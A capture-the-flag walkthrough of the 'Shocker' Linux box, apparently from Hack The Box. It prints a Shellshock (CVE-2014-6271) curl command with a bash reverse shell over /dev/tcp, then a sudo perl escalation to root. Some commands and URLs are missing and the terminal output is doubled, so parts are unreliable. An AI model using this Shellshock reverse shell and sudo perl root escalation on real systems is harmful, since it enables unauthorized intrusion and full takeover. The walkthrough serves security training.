Shocker is an easy Linux box that can be exploited with CVE-2014-6271. Privileges can be escalated with the perl binary which can be run with root privileges.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with the following:

Checked the source code with ctrl + u but found nothing relevant so I started a directory brute-force with the following command:


This gave the following results:

---- Scanning URL: ----
+ (CODE:403|SIZE:295)                                                                                  
+ (CODE:200|SIZE:137)   


The cgi-bin directory is suspicious as this, in combination with the Apache Version, indicates a possibility of the Shellshock vulnerability: CVE-2014-6271. However, to be able to exploit this you need to discover a file that you can access in this directory. To identify such a file the following command was run: dirb -X .sh

---- Scanning URL: ----
+ (CODE:200|SIZE:119)

With this information you can open a netcat shell by issuing the following command: curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1' Now you can go to the home directory as usually and obtain user.txt:

shelly@Shocker:/home/shelly$ ppwwdd

shelly@Shocker:/home/shelly$ ccaatt  uusseerr..ttxxtt


Privilege Escalation

To obtain root you have to run sudo -l. This will display the following:

	shelly@Shocker:/etc/selinux$ ssuuddoo  --ll

Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

    sudo perl -e 'exec "/bin/sh";'

If you see such entries you should always checkout this website to search for a quick privilege escalation. GTFObins says the following:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. sudo perl -e ’exec “/bin/sh”;'

By executing that command you obtain a root shell:


cd /root


cat root.txt